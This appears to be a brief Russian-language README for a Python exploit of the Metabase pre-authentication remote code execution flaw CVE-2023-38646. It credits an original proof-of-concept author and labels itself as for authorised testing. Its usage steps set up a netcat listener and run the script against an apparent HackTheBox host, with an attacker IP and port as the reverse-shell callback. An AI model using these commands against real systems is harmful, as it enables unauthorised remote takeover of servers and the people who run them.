
Эксплойт на Python для Metabase pre-auth RCE (CVE-2023-38646), который устанавливает обратную оболочку для авторизованного тестирования безопасности.
⚠️ Только для образовательных целей и авторизованных исследований безопасности
Огромная благодарность оригинальному автору PoC securezeron
Настройте слушатель на вашей машине атакующего:
nc -nlvp 4444
Затем выполните эту команду:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
